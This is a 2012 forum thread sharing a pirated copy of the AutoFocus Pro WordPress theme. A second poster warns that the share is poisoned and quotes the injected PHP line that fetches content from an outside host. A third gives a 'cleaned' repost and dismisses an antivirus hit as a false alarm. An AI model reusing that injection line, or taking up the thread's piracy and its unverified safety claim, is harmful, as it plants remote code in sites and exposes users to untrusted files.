27.gif

Search (advanced search)
Use this Search form before posting, asking or make a new thread.
Tips: Use Quotation mark to search words (eg. "How To Make Money Online")

05-16-2012, 09:29 AM
Post: #1
[GET] AutoFocus 2.0.6 PRO Wordpress
[Image: yqPfE.jpg]

Code:
In short, AutoFocus+ is a clean and simple WordPress theme developed for photographers looking to showcase their work. A slight departure from the original verision, AutoFocus+ takes things a bit further by providing stronger markup, better browser support, and Theme options that enable you to customize various elements of the theme without ever touching code. I’ve also ported over the back-end to Thematic, one of (if not) the strongest WordPress theming frameworks to date. That means AutoFocus+ and Thematic come together to make for a pretty slick theme that can be used for almost any type of site. There’s both a Free version and a Pro version($15) available which comes with tons of new and ever developing features.

More info:
Code:
http://allancole.com/wordpress/437/autofocus-now-available/

Download:
link removed
More MVP Design Method here --> click <---
05-17-2012, 04:52 PM
Post: #2
RE: [GET] AutoFocus 2.0.6 PRO Wordpress
POISONED SHARE

DO NOT USE
Like similar files, contains encrypted code in functions php to fetch off-site code.
(tests show links, but could easily carry iframe, scripts or other, so treat as threat risk)

Code:
echo @file_get_contents("http://www.beteks.com/links.php?url=".$_SERVER["SERVER_NAME"]);

I'll clean the shares and re-post when I get the time (next few days)

Please remove share link asap

Si
05-18-2012, 01:03 PM
Post: #3
RE: [GET] AutoFocus 2.0.6 PRO Wordpress
Ok, here is the cleaned version of the above share, poisoned code removed.

Code:
http://uploadmirrors.com/download/0HHNRAW4/autofocuspro.zip

VT: 1/38 - PUA.Script.Packed-2 ( ClamAV )
Code:
https://www.virustotal.com/file/bdd6fdeb5e12a01e6ecb01f71700dbbe90a9c4567e53b966b424c47e8dc7c123/analysis/1337280870/

The ClamAV PUA detection is most likely a false trigger, this happens a lot due to dense written javascript - I don't see any other issues in the code, please check locally as you see fit

Enjoy,
Si




49.gif